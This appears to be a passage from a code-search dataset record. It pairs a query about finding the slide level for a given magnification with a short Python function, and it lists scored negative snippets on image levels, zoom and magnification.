ref_zg):\n ref_lev = ref_lev.compressed()\n ref_zg = ref_zg.compressed()\n if len(ref_lev) < 2:\n return np.full(air_pressure_bounds.shape[0], np.nan)\n func = interp1d(ref_lev, ref_zg, kind='cubic', fill_value='extrapolate')\n level_widths = []\n for bounds in air_pressure_bounds:\n level_width = abs(func(bounds[0]) - func(bounds[1]))\n level_widths.append(level_width)\n return np.array(level_widths)", "def dimensions(self) -> typing.Tuple[int, int]:\n dimensions = self.data[2]\n dimensions = re.findall(r'(\\d+)\\s+x\\s+(\\d+)\\s+M', dimensions.replace('-', '0'))\n return dimensions[0] if dimensions else (0, 0)", "def Nlevels(self):\n return self._nlevels", "def dim(self) -> int:", "def dim(self):\n return self.__dim__", "def n_levels(self):\n return self.primary_header['Number of levels']", "def dim(self):\n return self._dim", "def dim(self):\n raise NotImplementedError", "def dim(self):\n return self._domain.dim", "def dimension(self):\r\n a = 0\r\n for x in self.faces():\r\n if (len(x) > a):\r\n a = len(x) \r\n return a-1", "def get_dimensions(self, obj):\n return str(obj.dimensions)", "def zoomlevels(self):\n return self._bboxes[0][1] #TODO: merge all coverages", "def get_dimension(self):\n return self._dimension", "def n_z(self, level):\n resolution = self.resolution(level)\n return (self.z_extent // resolution + 63) // 64", "def getdim(self):\n return round(self.w() / self.c)", "def get_dimensions(self):\n return self.lon_arr.shape", "def getDimension(unique_name):", "def getDimension(unique_name):", "def __len__(self) -> int:\n\n return 
self.layout.gaDims", "def take_max_level(self):\n level = 0\n for k, v in self.d.items():\n level = max(level, len(k.split(\":\")))\n return level", "def get_number_of_atmos_levels(description):\n if description == \"none\":\n return \"0\", \"0\"\n elif re.search(\"levels\", description):\n match = re.search(\"(?P<nl>\\d+)\\s?(levels|vertical levels)\", description)\n nlevs = match.groupdict()[\"nl\"]\n if int(nlevs) > 49: nlas = \"20\"\n else: nlas = \"10\"\n return nlevs, nlas\n else:\n return \"40\", \"20\"", "def GetDimensions(self, p_int=..., p_int=..., p_int=..., *args, **kwargs):\n ...", "def dimension(self):\n return self._dimension", "def dimension(self):\n return self._dimension", "def dimension(self):\n return self._dimension", "def dimension(self):\n return self._dimension", "def nlevels(self) -> int:\n return len(self._levels)", "def get_dimensions(self, labware_id: str) -> Dimensions:\n definition = self.get_definition(labware_id)\n dims = definition.dimensions\n\n return Dimensions(\n x=dims.xDimension,\n y=dims.yDimension,\n z=dims.zDimension,\n )", "def depths(self):\n return self._origin.depth", "def depths(self):\n return self._origin.depth", "def dimensions(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ElastigroupScalingDownPolicyDimensionArgs']]]]:\n return pulumi.get(self, \"dimensions\")", "def dimension_size(self):\n return self._dim", "def listdimension(self):\n return list(self.dimensions.keys())", "def _get_tensor_depth(x):\n return np.prod(x.get_shape().as_list()[1:])", "def test_level_width_2(self):\n root = Node(0)\n root.add(1)\n root.children[0].add(2)\n root.children[0].add(3)\n root.children[0].children[0].add(4)\n self.assertEqual(level_width(root), [1, 1, 2, 1])", "def calc_dimension(your_mesh):\n minx = your_mesh.x.min()\n maxx = your_mesh.x.max()\n miny = your_mesh.y.min()\n maxy = your_mesh.y.max()\n minz = your_mesh.z.min()\n maxz = your_mesh.z.max()\n return minx, maxx, miny, maxy, minz, maxz", "def get_dimension(self) -> int:\n return self.embedder.get_dimension()", "def dim(self) -> tuple:\n if self.has_tensor(): return self.as_tensor().dim()\n else:\n return tuple(list(self[0].dim()[0]) + [len(self)]), self[0].dim()[1]", "def get_num_levels(self):\n return len(self._Psi)" ]
[ "0.7337827", "0.7250944", "0.7064121", "0.7035364", "0.6847221", "0.67899704", "0.67407316", "0.6720339", "0.66824", "0.66605484", "0.66371953", "0.6546749", "0.6472022", "0.6469843", "0.64618737", "0.6444262", "0.6423922", "0.6412058", "0.6396843", "0.6379703", "0.6365779", "0.63647896", "0.63589346", "0.6353814", "0.63318825", "0.63226545", "0.62823856", "0.6281621", "0.62745583", "0.6257524", "0.6257524", "0.6257524", "0.6257524", "0.6256068", "0.6256068", "0.62414914", "0.6225913", "0.621027", "0.6202955", "0.6202067", "0.6195175", "0.61944956", "0.6166258", "0.6164681", "0.6154628", "0.61441064", "0.61437184", "0.6122517", "0.6114838", "0.61103433", "0.6103652", "0.61011976", "0.6093304", "0.60926634", "0.60839534", "0.60815245", "0.60686684", "0.60616255", "0.6061368", "0.60609555", "0.60455275", "0.6041046", "0.604075", "0.6037806", "0.60347426", "0.6029926", "0.60267496", "0.60242796", "0.6024051", "0.6018935", "0.60140216", "0.60049504", "0.6002765", "0.5997771", "0.59968007", "0.598715", "0.59869015", "0.5979981", "0.5979981", "0.5979844", "0.59772533", "0.59749603", "0.5972986", "0.597139", "0.597139", "0.597139", "0.597139", "0.59711415", "0.5969911", "0.5969136", "0.5969136", "0.5961064", "0.5957652", "0.5955843", "0.5934096", "0.593292", "0.5928127", "0.592379", "0.59115964", "0.59108734" ]
0.8075793
0
Returns the magnification at a particular level
def get_level_mag(slide, level):
    return level_mags(slide)[level]
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _calculate_magnification(self, times):\n if self._model.n_lenses == 2:\n factor = 10.\n params = self._model.parameters\n t_1 = params.t_0 - factor * params.t_E\n t_2 = params.t_0 + factor * params.t_E\n self._model.set_magnification_methods([t_1, 'VBBL', t_2])\n self._model.set_default_magnification_method(\n 'point_source_point_lens')\n\n magnification = self._model.magnification(times)\n return magnification", "def getNativeMagnification(self):\n pixelInfo = self._tiffDirectories[-1].pixelInfo\n mm_x = pixelInfo.get('mm_x')\n mm_y = pixelInfo.get('mm_y')\n # Estimate the magnification if we don't have a direct value\n mag = pixelInfo.get('magnification') or 0.01 / mm_x if mm_x else None\n return {\n 'magnification': mag,\n 'mm_x': mm_x,\n 'mm_y': mm_y,\n }", "def get_level_for_mag(slide, mag):\n level_mags_rounded = list(np.round(level_mags(slide), decimals = 2))\n if mag in level_mags_rounded:\n return level_mags_rounded.index(mag)\n else: \n return None", "def level_mags(slide):\n return [highest_mag(slide)/downsample for downsample in slide.level_downsamples]", "def mag(self):\n return self.photosamplers.get_estimate(mag=True)[0]", "def get_mag(self):\n raise NotImplementedError", "def get_thumbnail_magnification(slide):\n ratio = np.asarray(slide.dimensions) / np.asarray(slide.associated_images[\"thumbnail\"].size)\n # np.sqrt(np.prod(ratio))\n return ratio", "def getNativeMagnification(self):\n return self._nativeMagnification.copy()", "def highest_mag(slide):\n return int(slide.properties['aperio.AppMag'])", "def get_level_size(slide, level):\n return slide.level_dimensions[level]", "def get_mag_for_size(slide, size):\n max_size = slide.dimensions\n max_mag = highest_mag(slide)\n downsample = np.average([max_dim/size_dim for max_dim, size_dim in zip(max_size, size)])\n return max_mag/downsample", "def detail(self):\n return self.uniform(\"detail\",\n self.img_scale * .05,\n self.img_scale * .2)", "def mag(self) -> complex:\n return self.major_extent", "def resolution(self, level):\n return 2 ** (level - 1)", "def magnitude(x):\n return x.magnitude if hasattr(x, 'magnitude') else x", "def mag2(self) -> numbers.Number:\n mv_val = self.layout.gmt_func(self.layout.adjoint_func(self.value), self.value)\n return mv_val[0]", "def read_slide_at_mag(slide, mag):\n exact_level = get_level_for_mag(slide, mag)\n if exact_level is not None:\n return slide.read_region((0,0), exact_level, get_level_size(slide, exact_level))\n else:\n max_size = slide.dimensions\n region_size = tuple(get_size_for_mag(slide, mag))\n downsample = np.average([max_dim/region_dim for max_dim, region_dim in zip(max_size, region_size)])\n best_level = slide.get_best_level_for_downsample(downsample)\n best_level_size = get_level_size(slide, best_level)\n best_level_img = slide.read_region((0,0), best_level, best_level_size)\n return best_level_img.resize(region_size, resample = Image.BICUBIC)", "def difficulty(mag):\n mag = float(mag)\n if mag <= -4:\n return \"Visible in daytime.\"\n elif mag <= 6:\n return \"Visible at night.\"\n else:\n flux = mag_def(\"%s x\" % mag)\n needed_flux = mag_def(\"6 x\")\n eye_area = math.pi * (0.005**2)\n needed_power = needed_flux * eye_area\n diameter = 2 * math.sqrt(needed_power / (flux*math.pi))\n return \"%s m telescope needed.\" % diameter", "def _get_med(self):\n return self.__med", "def enemyrawdmg(self):\n\n enemystr = globalvalues.ai.getstatus()[3]\n # rngfactor will ensure that regular mobs won't absolutely crush you\n rngfactor = float(float(random.randint(45, 65)) / 
100)\n level = (\n globalvalues.p1.getlevel()\n - globalvalues.ai.getstatus()[0]\n )\n lvlfactor = float(1 - level * 0.05)\n\n return int((enemystr) * 102 * 0.12 * rngfactor * lvlfactor)", "async def get_xp(level, command):\n if command == \"profile\":\n return 250 * level\n return int((2 * 350) * (2 ** (level - 2))) # 350 is base value (level 1)", "def get_map_size(level):\n if level < 5:\n return 5, 5\n if level < 70:\n return 10, 10\n if level < 150:\n return 25, 25\n return 50, 50", "def normalize_zoomlvl(lvl):\n if lvl < gMinZoomLevel:\n return gMinZoomLevel\n elif lvl > gMaxZoomLevel:\n return gMaxZoomLevel\n else:\n return lvl - gMinZoomLevel", "def magnitude(pos):\n x, y = pos\n return x * x + y * y", "def rscale(mag=10.0):\n if mag > 11.5:\n return 0.5\n elif mag > 11.0:\n return 1.0\n elif mag > 10.5:\n return 1.5\n elif mag > 10.0:\n return 1.5\n elif mag > 9.5:\n return 2.0\n elif mag > 9.0:\n return 2.5\n elif mag > 8.5:\n return 3.0\n else:\n return 3.5", "def mab0(self):\n return GALEX_INFO[self.bandname][\"ABmag0\"]", "def getMagnification(self, pixelSize=0.0129, isFilter=False, erodeIter=None):\r\n\r\n if not hasattr(self, 'determinantMap'):\r\n _ = self._getDeterminantMap()\r\n\r\n if hasattr(self, 'finalPathesMarked'):\r\n finalPatches = self.finalPatchesMarked\r\n elif hasattr(self, 'finalPatches'):\r\n finalPatches = self.finalPatches\r\n else:\r\n self.processTrial()\r\n finalPatches = self.finalPatches\r\n\r\n magMap = 1 / self.determinantMap\r\n\r\n if isFilter:\r\n magMap = ni.filters.gaussian_filter(magMap, self.params['signMapFilterSigma'])\r\n\r\n # get mean power amplitude for all visual areas normalized by V1\r\n magDict = {}\r\n for key, patch in finalPatches.items():\r\n array = patch.array.astype(np.float)\r\n\r\n if erodeIter:\r\n array = ni.binary_erosion(array, iterations=erodeIter)\r\n\r\n area = np.sum(array)\r\n\r\n totalMag = np.sum(array * magMap)\r\n\r\n magDict.update({key: (pixelSize ** 2) * totalMag / area})\r\n\r\n return magDict", "def get_size_for_mag(slide, mag):\n max_size = slide.dimensions\n max_mag = highest_mag(slide)\n downsample = max_mag/mag\n return [np.int(np.round(dim/downsample)) for dim in max_size]", "def _get_depth_map_scale_subfolder(self):\n if self.im_scale <= 0.25:\n if self.im_scale <= 0.125:\n return \"Depth/0.125/\"\n else:\n return \"Depth/0.25/\"\n else: \n return \"Depth/\"", "def mag(self) -> float:\n return sqrt(self.sqr_mag())", "def flux2Mag(flux, zeropoint=27.0):\n return -2.5 * np.log10(flux) + zeropoint", "def zoomlevels(self):\n return self._bboxes[0][1] #TODO: merge all coverages", "def getMagFlux(self):\n return self.magflux", "def mi_to_m(radius):\n return int(float(radius) * 1609.34)", "def __get_maidenhead(self, level):\n \n mh_resp = {'grid': None, 'lock': False}\n loc = self.__get_gps_location()\n\n if loc['lock']:\n mh_resp['lock'] = True\n mh_resp['grid'] = mh.to_maiden(loc['lat'], loc['lon'], precision=level)\n\n return mh_resp", "def magnification(w0, lambda0, s, f, M2=1):\n zR2 = z_rayleigh(w0, lambda0, M2)**2\n return f/np.sqrt((s+f)**2+zR2)", "def get_min_mag_center(self):\r\n\t\treturn self.min_mag + self.bin_width / 2", "def get_prior_mag(mag_dict):\n print(\"GETTING MAGNITUDE\")\n print(mag_dict)\n print(type(mag_dict))\n mag = 17\n if not isinstance(mag_dict, dict):\n print(\"Not a dictionary so using mag=17\")\n return mag\n\n for k, v in mag_dict.items():\n mag = v['mag']\n\n try:\n mag = float(mag)\n except Exception as e:\n print(str(e), \"Error getting magnitude\")\n mag = 17\n 
print(mag)\n return mag", "def medoidMosaic(self,collection):\n \n\t\t# calculate the median of temp band\n\t\tthermal = ee.ImageCollection(collection.select(['thermal'])).median()\n \n\t\tcollection = collection.select(self.env.divideBands)\n\n\t\tbandNames = self.env.divideBands;\n\t\tbandNumbers = ee.List.sequence(1,bandNames.length());\n \n\t\t# calculate medion\n\t\tmedian = ee.ImageCollection(collection).median()\n \n\t\tdef subtractmedian(img):\n\t\t\tdiff = ee.Image(img).subtract(median).pow(ee.Image.constant(2));\n\t\t\treturn diff.reduce('sum').addBands(img);\n \n\t\tmedoid = collection.map(subtractmedian)\n \n\t\tmedoid = ee.ImageCollection(medoid).reduce(ee.Reducer.min(bandNames.length().add(1))).select(bandNumbers,bandNames);\n \n\t\treturn medoid.addBands(thermal);", "def get_magmom_string():\n\n magmoms = []\n poscar_lines = open('POSCAR').readlines()\n elements = poscar_lines[5].split()\n amounts = poscar_lines[6].split()\n for i in range(len(elements)):\n if Element(elements[i]).is_transition_metal:\n magmoms.append('{}*6.0'.format(amounts[i]))\n else:\n magmoms.append('{}*0.5'.format(amounts[i]))\n return ' '.join(magmoms)", "def get_multiplier(quality):\n\n if quality == \"low\":\n return 5\n elif quality == \"medium\":\n return 6\n elif quality == \"good\":\n return 7\n elif quality == \"high\":\n return 8\n return 6", "def displacement_mag(self):\n print(3284 * math.pow(self.concentration, -0.158))\n\n return 3284 * math.pow(self.concentration, -0.158)", "def _get_normal_map_scale_subfolder(self):\n if self.im_scale <= 0.25:\n if self.im_scale <= 0.125:\n return \"Normals/0.125/\"\n else:\n return \"Normals/0.25/\"\n else: \n return \"Normals/\"", "def build_mipmaps(self, base: int = 0, max_level: int = 1000) -> None:\n if self._samples > 0:\n raise ValueError(\"Multisampled textures don't support mimpmaps\")\n\n gl.glActiveTexture(gl.GL_TEXTURE0 + self._ctx.default_texture_unit)\n gl.glBindTexture(gl.GL_TEXTURE_2D, self._glo)\n gl.glTexParameteri(gl.GL_TEXTURE_2D, gl.GL_TEXTURE_BASE_LEVEL, base)\n gl.glTexParameteri(gl.GL_TEXTURE_2D, gl.GL_TEXTURE_MAX_LEVEL, max_level)\n gl.glGenerateMipmap(gl.GL_TEXTURE_2D)", "def getMeasure(unique_name):", "def getMeasure(unique_name):", "def Mass_in_R(self, r):\n return self.int_over_density(r)", "def mag(self):\n return math.sqrt(sum([coefficient ** 2\n for coefficient in self.values]))", "def mag(field):\n return np.sqrt(np.sum(field**2, axis=0, keepdims=True))", "def magn(names, values, data, model_key, plot_key=False):\n # Making sure number of parameters matches number of names given:\n assert len(names) == len(values), \"len(names) != len(values) in datasim.magn\"\n\n zpicks = data['zpicks']\n # Corrected absolute magnitude M of SN.\n M = values[0]\n\n# dlpc, da, integrated_zpicks, integrated_dlpc, plot_var = zodesolve.zodesolve(names, values, zpicks, model_key, plot_key)\n\n dlpc, da, plot_var = zodesolve.zodesolve(names, values, zpicks, model_key, plot_key)\n\n # Calculating apparent magnitudes of supernovae at the simulated\n # luminosity distances using the distance modulus formula.\n mag = 5 * np.log10(dlpc/10) + M\n# integrated_mag = 5 * np.log10(integrated_dlpc/10) + M\n# print('redshift =',zpicks[-1],'da =', da[-1])\n\n# # plotting interpoated data vs input and full\n# import matplotlib.pyplot as plt\n# import matplotlib as mpl\n# #mpl.style.use('default') # has to be switched on to set figure size\n# mpl.style.use('fivethirtyeight')\n# plt.rcParams['axes.facecolor'] = 'white'\n# plt.rcParams['figure.facecolor'] = 
'white'\n# plt.rcParams['grid.color'] = 'white'\n#\n# print('integrated_zpicks',integrated_zpicks[0])\n# print('zpicks', zpicks[0])\n#\n# plt.figure()\n# plt.scatter(integrated_zpicks, integrated_mag, s=70, label='integrated', c=\"C{}\".format(0))\n# plt.plot(zpicks, mag, label='interpolated', linestyle='-', c=\"C{}\".format(1))\n# plt.legend()\n\n if plot_key:\n # Plotting evolution of parameters in the model.\n import plots\n plots.modelcheck(mag, zpicks, plot_var, model_key)\n\n return mag, da", "def getM(self):\r\n return self.M", "def _magsamples(self):\n if self._derived_properties[\"magsamples\"] is None:\n if self.lbda is None:\n raise AttributeError(\"lbda not set.\")\n self.derive_magsamples()\n \n return self._derived_properties[\"magsamples\"]", "def getModifiers(self, img_info):\n modifiers = \"\"\n width_percent_reduction = 0\n height_percent_reduction = 0\n max_width = float(self.cfg().chatimg.max_width)\n max_height = float(self.cfg().chatimg.max_height)\n if max_width and img_info.width > max_width:\n width_percent_reduction = (img_info.width / max_width) - 1.0\n if max_height and img_info > max_height:\n height_percent_reduction = (img_info.height / max_height) - 1.0\n\n if width_percent_reduction > 0 and width_percent_reduction > height_percent_reduction:\n modifiers = \" width=\\\"%s\\\" \" % max_width\n elif height_percent_reduction > 0:\n modifiers = \" height=\\\"%d\\\" \" % max_height\n\n return modifiers", "def tile_gen_at_mag(wsi, mag, tile_size):\n #Get size of WSI at Level 0 (Max Magnification)\n x0, y0 = wsi.level_dimensions[0]\n #Get size of WSI at the mag we want\n x_mag, y_mag = get_size_for_mag(wsi, mag)\n x_tiles = int(np.floor(x_mag/tile_size))\n y_tiles = int(np.floor(y_mag/tile_size))\n #Scale tile size accordingly\n scale = highest_mag(wsi)/mag\n yield (x_tiles, y_tiles)\n tiles = []\n for y in range(y_tiles):\n for x in range(x_tiles):\n x_coord = round(x*scale*tile_size)\n y_coord = round(y*scale*tile_size)\n scaled_tile_size = round(scale*tile_size)\n tile = wsi.read_region((x_coord, y_coord), 0, (scaled_tile_size, scaled_tile_size))\n yield tile.resize((tile_size, tile_size), resample = Image.BICUBIC)", "def get_median_area(self, mag, rake):\n return 1e-4", "def estimate_phones(x):\n if x['mean_luminosity_km2'] > 5:\n return 10\n elif x['mean_luminosity_km2'] > 1:\n return 5\n else:\n return 1", "def M(self):\n return self._properties['M']", "def getMagnificationsFromTiltSeries(self, TiltSeries_):\n # initialize alignment in seperate array - easier for optimization\n self._alignmentMagnifications = len(TiltSeries_._ProjectionList._list) * [1.]\n for (kk, proj) in enumerate(TiltSeries_._ProjectionList._list):\n self._alignmentMagnifications[kk] = proj.getAlignmentMagnification()\n return self._alignmentMagnifications", "def mag(q):\n magnitude = np.sqrt((q[0,0]**2)+(q[0,1]**2)+(q[0,2]**2)+(q[0,3]**2))\n return magnitude", "def zoomlevels(self):\n return self._bboxes[0][1] #TODO: merge all coverages", "def getLevel(self, level):\n mingroup = None\n groups = self.console.storage.getGroups()\n\n for x in groups:\n\n if x.level < level:\n continue\n\n if mingroup is None:\n mingroup = x\n continue\n\n if x.level < mingroup.level:\n mingroup = x\n\n return mingroup.name", "def sazelmag(source):\n if 1:\n # bizarre failures in s.azel() showing up on Mar 11, 2006....\n try:\n Azel = subarrayControl.s.azel(source, 0.0);\n except Exception, e:\n print \"Problem with s.azel(%s): %s\" %(source,e)\n return (source, 0, -10, 0)\n try:\n mag = 
subarrayControl.s.queryMag(source)\n except Exception, e:\n print \"Problem with queryMag(%s): %s\" %(source,e) \n return (source, 0, -10, 0)\n return ( source, Azel[0], Azel[1], mag)\n else:\n cmd = 'checksource source=%s comments=t sexa=f' % source\n # the 2nd (last) line contains all the info\n r=os.popen(cmd).readlines()[1].strip()\n rs=r.split()\n re=r.split('=')\n if len(re) == 2:\n mag=float(re[1])\n else:\n mag=-9.99\n return ( source, float(rs[3]), float(rs[4]), mag)", "def calcMag(self):\n M = np.sum(self.config)\n return M", "def get_modifier(path, lfdb):\n (cam, lens) = get_cam_lens(path, lfdb)\n (width, height) = map(int, get_exif(path, 'ImageSize').split('x'))\n return lensfunpy.Modifier(lens, cam.crop_factor, width, height)", "def mag_err(self):\n return self.photosamplers.get_estimate(mag=True)[1:]", "def magabs(self):\n if not self.has_target():\n raise AttributeError(\"No target defined, I can't get the distance\")\n return self.mag - 5*( np.log10(self.target.distmpc*1.e6) - 1)", "def compute_obj_mag(obj_flux, candle_flux, candle_mag):\n instrument_mag = -2.5 * np.log10(candle_flux)\n offset = instrument_mag - candle_mag\n return -2.5 * np.log10(obj_flux) - offset", "def getMagnitudes(self):\n return self._bmag, self._vmag, self._jmag, self._hmag, self._kmag", "def _level_info(entity):\n if entity.is_max_level():\n return 'Maxed'\n if entity.max_level is not None:\n return '{entity.level}/{entity.max_level}'.format(entity=entity)\n return entity.level", "def calc_mag(self):\n mag = np.sum(self.box)\n return mag", "def max_stat(self, stat: Stat, level: Optional[int]=None):\n if level is None:\n level = self.level\n\n if stat.name.upper() == \"HP\":\n value = (self.individual_values[stat] + self.species.base_stats[stat] + math.sqrt(self.effort_values[stat]) / 8 + 50) * level / 50 + 10\n else:\n value = (self.individual_values[stat] + self.species.base_stats[stat] + math.sqrt(self.effort_values[stat]) / 8) * level / 50 + 5\n\n return int(value)", "def get_mlt_phys(sed_name):\n\n new_name = sed_name.replace('+','-').replace('a','-').split('-')\n\n logg_sgn_dex = len(new_name[0])\n\n if sed_name[logg_sgn_dex] == '-':\n logg_sgn = 1.0\n elif sed_name[logg_sgn_dex] == '+':\n logg_sgn = -1.0\n else:\n raise RuntimeError('Cannot get logg_sgn for %s' % sed_name)\n\n metallicity_sgn_dex = len(new_name[0]) + len(new_name[1]) + 1\n\n if sed_name[metallicity_sgn_dex] == '-':\n metallicity_sgn = -1.0\n elif sed_name[metallicity_sgn_dex] == '+':\n metallicity_sgn = 1.0\n else:\n raise RuntimeError('Cannot get metallicity_sgn for %s' % sed_name)\n\n teff = 100.0*float(new_name[0][3:])\n metallicity = metallicity_sgn*float(new_name[2])\n logg = logg_sgn*float(new_name[1])\n\n return teff, metallicity, logg", "def extract_level_from_name(self):\n images = glob.glob(os.path.join(self.frame_dir, '*'))\n level = []\n for i, im in enumerate(images):\n base, tail = os.path.split(im)\n name = tail.split('.')[-2]\n number = name.split('_')[-1]\n level.append(float(number))\n return np.array(level)", "def galaxy(img):\n return img[420:490, 710:770]", "def zoom(self):\n return self['zoom']", "def add_Mag_Value(self, input):\n self.magflux = input", "def get_M(self):\n return 1.0", "def getLevel(unique_name):", "def mab0(self):\n return WISE_INFO[self.bandname][\"ABmag0\"]", "def test_changeIlluminationLevel(self):\n fade_to_black = \"Your environs fade to black due to Ineffable Spooky Magic.\"\n no_change = \"You do it. 
Swell.\"\n dark_to_light = \"Your environs are suddenly alight.\"\n brighten = \"Your environs seem slightly brighter.\"\n endarken = \"Your environs seem slightly dimmer.\"\n Manipulator.createFor(self.playerWrapper.actor)\n\n self._test(\n \"illuminate 0\",\n [fade_to_black],\n [fade_to_black])\n\n ll = self.store.findUnique(\n objects.LocationLighting,\n objects.LocationLighting.thing == self.location)\n self.assertEquals(ll.candelas, 0)\n\n self._test(\n \"illuminate 0\",\n [no_change])\n self.assertEquals(ll.candelas, 0)\n\n self._test(\n \"illuminate 100\",\n [dark_to_light],\n [dark_to_light])\n self.assertEquals(ll.candelas, 100)\n\n self._test(\n \"illuminate 110\",\n [brighten],\n [brighten])\n self.assertEquals(ll.candelas, 110)\n\n self._test(\n \"illuminate 100\",\n [endarken],\n [endarken])\n self.assertEquals(ll.candelas, 100)\n\n self._test(\n \"illuminate 0\",\n [fade_to_black],\n [fade_to_black])\n self.assertEquals(ll.candelas, 0)", "def get_info(self, level):\n\n # see if we can open the tile info file.\n info_file = os.path.join(self.tile_dir, '%02d' % level,\n self.TileInfoFilename)\n try:\n fd = open(info_file, 'rb')\n except IOError:\n return None\n\n # OK, looks like we actually do have this level!\n info = pickle.load(fd)\n fd.close()\n\n return info", "def take_mag(x, dim=1):\n power = torch.stack(torch.chunk(x, 2, dim=dim), dim=-1).pow(2).sum(dim=-1)\n power = power + EPS\n return power.pow(0.5)", "def GetScale(self):\n ...", "def getMagBoundary(self):\n\n # Get the boundary of magnitude based on the filter\n lowMagnitude = nan\n highMagnitude = nan\n if (self.filter == self.FilterU):\n lowMagnitude = 7.94\n highMagnitude = 14.80\n\n elif (self.filter == self.FilterG):\n lowMagnitude = 9.74\n highMagnitude = 16.17\n\n elif (self.filter == self.FilterR):\n lowMagnitude = 9.56\n highMagnitude = 15.73\n\n elif (self.filter == self.FilterI):\n lowMagnitude = 9.22\n highMagnitude = 15.26\n\n elif (self.filter == self.FilterZ):\n lowMagnitude = 8.83\n highMagnitude = 14.68\n \n elif (self.filter == self.FilterY):\n lowMagnitude = 8.02\n highMagnitude = 13.76\n\n return lowMagnitude, highMagnitude", "def AB_zero_mag(self):\n if self.wavelength_unit is None:\n raise AttributeError('Needs wavelength units')\n\n C1 = (Unit(self.wavelength_unit).to('AA') ** 2 /\n Constants.c.to('AA/s').value)\n c1 = self._lpivot ** 2 * C1\n\n m = 2.5 * np.log10(_drop_units(c1)) + 48.6\n return m", "def magnitude_vect(vect):\n mag = (vect[0] ** 2 + vect[1] ** 2 + vect[2] ** 2) ** .5\n return mag", "def get_min_mag_edge(self):\r\n\t\treturn self.min_mag", "def setMagnificationsInTiltSeries(self, TiltSeries_):\n kk = 0\n for proj in TiltSeries_._ProjectionList._list:\n proj.setAlignmentMagnification(self._alignmentMagnifications[kk])\n kk = kk + 1", "def get_scale():\r\n\r\n \r\n return 0.5", "def set_mag(self, target_mag):\n raise NotImplementedError", "def QuatMag(wxyz):\n return np.sqrt(np.sum(np.square(wxyz)))", "def get_estimate(self, mag=False):\n if mag is False:\n return super(PhotoSamplers,self).get_estimate()\n \n return self._magsamples.get_estimate()", "def zoom(self):\n res = np.max(self.metadata[\"resolution\"])\n\n if self.atlas_name == \"allen_human_500um\":\n logger.debug(\n \"ATLAS: setting zoom manually for human atlas, atlas needs fixing\"\n )\n return 350\n else:\n return 40 / res", "def d50Illum(wavelength):\n return _d50Illum.calc(wavelength)", "def maxResolution(self,wave = None):\n\n d = 2000.0*self.height*math.tan(self.angle/2) # Max pathlength in microns.\n dn = 
self.n.getDerivative(wave) # dn/dy of materail\n return d*dn #", "def get_level(self, level):\n return", "def calculateRatio(levelDims):\n highestReso = np.asarray(levelDims[0])\n lowestReso = np.asarray(levelDims[-1])\n Xratio, Yratio = highestReso/lowestReso\n return (Xratio, Yratio)", "def clamped(self, magnitude):\n return self.unit * magnitude", "def Damage_Weapon_Mod(self, w_multiplier, damage_type=\"\"):\n damage_type = str(damage_type);\n if damage_type == \"\":\n return \"\".join((\"[[\", self.W(w_multiplier), \"+\", self.Attribute_Power(\"damage\"), \"]] damage.\"));\n else:\n return \"\".join((\"[[\", self.W(w_multiplier), \"+\", self.Attribute_Power(\"damage\"), \"]] \", damage_type, \" damage.\"));", "def set_level(self, x, level):\n return x * 10 ** ((level - self.ref_level) / 20)" ]
[ "0.67559737", "0.6685309", "0.66784066", "0.65893006", "0.6497956", "0.62938315", "0.61198086", "0.6092812", "0.6024545", "0.5632027", "0.55412483", "0.5471536", "0.54661393", "0.5413815", "0.5413614", "0.53920174", "0.53455603", "0.5330778", "0.5330044", "0.5313709", "0.5275029", "0.52631474", "0.5228527", "0.5221894", "0.51973796", "0.5189064", "0.5183032", "0.51619035", "0.516099", "0.5150507", "0.51376766", "0.5134299", "0.51243895", "0.51142454", "0.5104735", "0.50758916", "0.50611293", "0.5057524", "0.5051156", "0.5048918", "0.5047178", "0.50306964", "0.50156546", "0.50002736", "0.49981356", "0.49981356", "0.49930725", "0.4987721", "0.4985973", "0.49804938", "0.49619427", "0.4947022", "0.49444", "0.49423897", "0.4938305", "0.4928025", "0.49217445", "0.49143326", "0.49119207", "0.4911245", "0.4906974", "0.4904951", "0.489991", "0.48896322", "0.48826405", "0.48799917", "0.48765293", "0.48667347", "0.48627496", "0.4848207", "0.48479176", "0.48465753", "0.4845178", "0.4839021", "0.48304582", "0.4819045", "0.4814439", "0.48122925", "0.48078236", "0.479065", "0.4777834", "0.47756505", "0.47691354", "0.47649318", "0.47612372", "0.4751469", "0.47512352", "0.47492564", "0.47477126", "0.47463083", "0.47404742", "0.47398472", "0.47360802", "0.4730037", "0.47252855", "0.47232857", "0.47141248", "0.4707393", "0.46992302", "0.46986446" ]
0.7867714
0
Get the level corresponding to a certain magnification, if available
def get_level_for_mag(slide, mag):
    level_mags_rounded = list(np.round(level_mags(slide), decimals = 2))
    if mag in level_mags_rounded:
        return level_mags_rounded.index(mag)
    else:
        return None
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_level_mag(slide, level):\n return level_mags(slide)[level]", "def getLevel(unique_name):", "def level_mags(slide):\n return [highest_mag(slide)/downsample for downsample in slide.level_downsamples]", "def mag(self):\n return self.photosamplers.get_estimate(mag=True)[0]", "def get_luminosity(name):\n all_data = mc.get('sensor_values')\n name = _lookup(name)\n try:\n return all_data[name][3]\n except KeyError:\n raise KeyError(\"No sensor with that name\")", "def getNativeMagnification(self):\n pixelInfo = self._tiffDirectories[-1].pixelInfo\n mm_x = pixelInfo.get('mm_x')\n mm_y = pixelInfo.get('mm_y')\n # Estimate the magnification if we don't have a direct value\n mag = pixelInfo.get('magnification') or 0.01 / mm_x if mm_x else None\n return {\n 'magnification': mag,\n 'mm_x': mm_x,\n 'mm_y': mm_y,\n }", "def zoomlevels(self):\n return self._bboxes[0][1] #TODO: merge all coverages", "def get_level(rol):\n\treturn rol.level", "def getLevel(self, level):\n mingroup = None\n groups = self.console.storage.getGroups()\n\n for x in groups:\n\n if x.level < level:\n continue\n\n if mingroup is None:\n mingroup = x\n continue\n\n if x.level < mingroup.level:\n mingroup = x\n\n return mingroup.name", "def highest_mag(slide):\n return int(slide.properties['aperio.AppMag'])", "def get_luminosity(self):\n\n if self.no_dist is False and self.no_flux is False:\n\n dist = self.distance\n snu = self.snu_at_1GHz\n lum = lumin(dist, snu)\n\n self.lum = lum\n else:\n self.lum = -1 # use -1 to indicate unknown luminosity\n return self.lum", "def resolution(self, level):\n return 2 ** (level - 1)", "def zoomlevels(self):\n return self._bboxes[0][1] #TODO: merge all coverages", "def _level_info(entity):\n 